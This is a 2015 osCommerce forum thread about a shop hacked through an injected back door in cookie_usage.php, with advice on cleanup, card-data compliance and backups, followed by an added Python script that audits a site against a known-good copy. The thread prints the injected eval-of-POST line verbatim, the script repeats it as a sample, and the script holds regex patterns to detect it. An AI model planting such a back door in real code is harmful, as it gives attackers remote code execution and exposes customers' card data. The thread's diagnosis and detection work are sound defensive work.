Firemann59 Posted August 25, 2015

I recently found a malicious line of code in cookies_usage.php. This was found by my web host. They took my site down until I had the malicious code removed, then brought my site back up. After it came back up some things are not posting to the database, all during check out: "Credit Card Type", "Credit Card Owner", and "Credit Card Expires". Everything else posts to the database just fine. Does anyone have an idea where I can look to solve this problem? I am also still working with the web host to see if it is something on their end.
Bob Terveuren Posted August 25, 2015

Hi, have a look at the stuff I added here (not so long ago by coincidence). Sounds like you'll maybe need to poke around in your classes/order.php which handles the fields in the database that you are missing. Tread carefully and make sure you backup before changing anything in that file; also be aware that the cc_type code lines appear twice in the class file and you should look to the second set for editing.

In addition you may also find that the fields are lying empty even after the code edits above. If so then double check the values being POST'ed from checkout_confirmation.php to checkout_process.php; if the names vary from the above link then modify to suit.
MrPhil Posted August 26, 2015

Was your site actually doing something improper, or did your host do a routine scan for what they consider "malicious" code, and removed code they felt was bad? I've seen hosts do that, and end up removing perfectly good code, causing applications to crash. What osC version are you running, what add-ons does it have, and what was the code removed? Have you compared it to the original code and confirmed that it was added by a hacker, or are you just taking your host's word for it what happened?
Firemann59 (Author) Posted August 26, 2015

I am running osC v2.2 rc2. The malicious code was a line in cookies_usage.php that was referenced here:

The cookie_usage.php appears to have been compromised with the injection of a malicious section at the top:

```php
if (isset($_GET["cookie"])) { echo 'cookie=2'; if (isset($_POST["es4"])) @eval($_POST["es4"]); exit; }
```

This allows the execution of PHP commands, as described here: http://www.oscommerce.com/forums/topic/372970-malware-cookie-usagephp-explained/

This line of code was removed, nothing else was touched. Here is the posting script from includes/classes/orders.php:

```php
$this->info = array('order_status' => DEFAULT_ORDERS_STATUS_ID,
                    'currency' => $currency,
                    'currency_value' => $currencies->currencies[$currency]['value'],
                    'payment_method' => $payment,
                    'cc_type' => (isset($GLOBALS['cc_type']) ? $GLOBALS['cc_type'] : ''),
                    'cc_owner' => (isset($GLOBALS['cc_owner']) ? $GLOBALS['cc_owner'] : ''),
                    'cc_number' => (isset($GLOBALS['cc_number']) ? $GLOBALS['cc_number'] : ''),
                    'cc_expires' => (isset($GLOBALS['cc_expires']) ? $GLOBALS['cc_expires'] : ''),
                    'cc_cvv2' => (isset($GLOBALS['cc_cvv2']) ? $GLOBALS['cc_cvv2'] : ''),
                    'shipping_method' => $shipping['title'],
                    'shipping_cost' => $shipping['cost'],
                    'subtotal' => 0,
                    'tax' => 0,
                    'tax_groups' => array(),
                    'comments' => (isset($GLOBALS['comments']) ? $GLOBALS['comments'] : ''));
```

And only cc_type, cc_owner, and cc_expires are affected.
burt Posted August 27, 2015

If your site has this hack, it likely has more. Worst Case Scenario: any customer of yours who paid by CC has had their card details harvested.

To ensure that your site is not malicious and to protect your future customers:
1. shut down your entire shop today.
2. put up a holding page explaining that you are spring cleaning and updating
3. ensure your database is free of hack activity
4. get the latest version of osCommerce up and running, and link it to your existing database
5. stop using the CC module
MrPhil Posted August 27, 2015

Yes, if you are using the old CC module, and storing credit card and CVV2 numbers for any length of time (or even just handling them), without being formally PCI-DSS compliant, you are almost certainly in violation of your merchant account agreement. You can face stiff penalties and even criminal prosecution, so stop using it immediately. By the way, osC 2.2 RC2 is ancient... you should be switching over to 2.3.4 as quickly as reasonably possible.
Firemann59 (Author) Posted August 31, 2015

I am not looking for legal advice or criticism; I am needing help getting my site back running properly.
14steve14 Posted August 31, 2015

If your site has been hacked the easiest way to get your site working again is to remove the whole site from your server and upload a known good copy from your backups. Removing the whole site will remove any back doors the hacker may have also installed. If you don't have backups, start keeping them regularly, just in case, or you could ask your hosts whether they have a good copy of your site. Some hosts offer a daily backup service included, so it may be worth a try. My hosts keep backups for 30 days, so it could be worth a try.

Your other option is to check through every file of your store's code, checking it against a standard new file, or one that you know was good. It takes time doing it line by line, but it is the only real way to make sure that there is no other code.

If you don't have a good known copy of your store, or cannot find any other malicious code, you will probably need help from the very people that you are insulting. They are trying to help you with very limited information from you.

What @burt suggested is the route you should ideally take. The version you are using is very old and considered by some to be vulnerable to hacks. The latest version is much more secure and if you use the BS version you may even get better search engine ranking as it is responsive.

It's your store so you have to make the decision what you need to do. Track down any malicious code or bite the bullet and start again. If it was me, I would start again because the chances are it will happen again on your old store. I expect the hacker is having a regular look to make sure you are still having problems.

REMEMBER BACKUP, BACKUP AND BACKUP
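The file-by-file check against a known-good copy that 14steve14 describes, as an added example that is not part of the thread: it flags eval-of-request-data lines like the one quoted earlier in the thread and lists every line a live PHP file has that the baseline copy lacks (and files with no baseline copy at all). The sample sources, path names and the `load_tree` helper are constructed for illustration.

```python
"""Audit a live osCommerce tree against a known-good copy (added example)."""
import difflib
import json
import re
import sys
from pathlib import Path

# Patterns derived from the injected snippet quoted in the thread:
# eval() fed from request data (optionally silenced with '@') and the
# $_GET["cookie"] trigger. Add your own patterns as you find them.
SUSPICIOUS = [
    re.compile(r'@?\s*eval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b'),
    re.compile(r'isset\s*\(\s*\$_GET\s*\[\s*["\']cookie["\']\s*\]'),
]

# Constructed samples: a clean file header and the same header with the
# injected line at the top, as reported in the thread.
CONSTRUCTED_GOOD = "<?php\nrequire('includes/application_top.php');\n"
CONSTRUCTED_BAD = ("<?php\n"
                   "if (isset($_GET[\"cookie\"])) { if (isset($_POST[\"es4\"])) @eval($_POST[\"es4\"]); exit; }\n"
                   "require('includes/application_top.php');\n")

def scan_source(src):
    """Return (line number, stripped line) for each line matching a pattern."""
    return [(n, line.strip()) for n, line in enumerate(src.splitlines(), 1)
            if any(p.search(line) for p in SUSPICIOUS)]

def diff_against_baseline(live, good):
    """Lines present in the live file but absent from the known-good copy."""
    return [l[1:] for l in difflib.unified_diff(good.splitlines(), live.splitlines(),
                                                lineterm='', n=0)
            if l.startswith('+') and not l.startswith('+++')]

def load_tree(root):
    """Map each PHP file's path (relative to root) to its source text."""
    root = Path(root)
    return {str(p.relative_to(root)): p.read_text(errors='replace') for p in root.rglob('*.php')}

def audit(live, good):
    """Report only files that need a look. 'added' is None when the file has no
    baseline copy at all, which is how a dropped-in back door usually shows up."""
    report = {}
    for rel, src in live.items():
        added = diff_against_baseline(src, good[rel]) if rel in good else None
        hits = scan_source(src)
        if hits or added is None or added:
            report[rel] = {'hits': hits, 'added': added}
    return report

if __name__ == '__main__':  # usage: python audit.py /path/to/live /path/to/known-good
    print(json.dumps(audit(load_tree(sys.argv[1]), load_tree(sys.argv[2])), indent=1))
```

Files reported with `added` set to `None` exist only in the live tree and deserve the closest look; a clean run returns an empty report.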